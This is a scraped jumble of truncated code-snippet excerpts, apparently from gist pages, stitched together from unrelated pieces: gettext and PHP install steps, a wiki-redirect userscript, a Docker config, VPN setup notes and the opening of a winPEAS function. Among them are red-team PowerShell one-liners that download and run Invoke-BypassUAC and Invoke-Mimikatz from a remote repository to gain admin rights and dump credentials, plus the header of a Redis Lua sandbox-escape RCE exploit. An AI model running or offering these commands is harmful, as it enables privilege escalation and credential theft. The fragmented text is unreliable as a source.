Check if gettext is installed, if not use Homebrew to get it:
$ brew install gettext
Get the gettext library and cpp flags, and configure with those flags:
$ brew info gettext | grep FLAGS
function Invoke-winPEAS | |
{ | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, Mandatory = $true)] | |
[ValidateNotNullorEmpty()] | |
[String] | |
$Command | |
) |
// ==UserScript== | |
// @name RS Redirector | |
// @description Redirect from Fandom to new RuneScape Wiki | |
// @author Sweepyoface | |
// @run-at document-start | |
// @match *://runescape.wikia.com/* | |
// @match *://runescape.fandom.com/* | |
// ==/UserScript== | |
if (window.location.pathname.startsWith("/wiki/")) { |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
# Docker-in-Docker Gitlab runners setup taken from: | |
# https://medium.com/@tonywooster/docker-in-docker-in-gitlab-runners-220caeb708ca | |
dind: | |
restart: always | |
privileged: true | |
volumes: | |
- /var/lib/docker | |
image: docker:17.09.0-ce-dind | |
command: | |
- --storage-driver=overlay2 |
# Download the OVPN file from ExpressVPN for the server you wish to access https://www.expressvpn.com/setup#manual | |
# Create files for certs and keys, use vi or nano, example is vi | |
cd /config/auth | |
sudo vi ca.cert | |
# type i and paste in your client certificate after <cert> up to </cert> | |
# type :wq | |
sudo vi cert.crt | |
# type i and paste in your certificate authority after <ca> up to </ca> |
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit | |
## Original exploit by corsix and sghctoma | |
## Author: @c3c | |
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode | |
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486 | |
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different | |
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf | |
## This code is much the same, except the process is done using pwntools' DynELF | |
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version |
#include <stdio.h> | |
#include <sys/mman.h> | |
#include <fcntl.h> | |
#include <pthread.h> | |
#include <unistd.h> | |
#include <sys/stat.h> | |
#include <string.h> | |
#include <stdint.h> | |
#include <stdlib.h> | |
#include <sys/types.h> |
# -*- coding: utf-8 -*- | |
from __future__ import unicode_literals | |
import base64 | |
import json | |
import logging | |
from urlparse import parse_qs | |
import requests |
#!/bin/bash | |
# PhalconPhp with PHP7 installation on ubuntu:16.04 | |
sudo apt-get update | |
sudo apt-get install -y php7.0-fpm \ | |
php7.0-cli \ | |
php7.0-curl \ | |
php7.0-gd \ |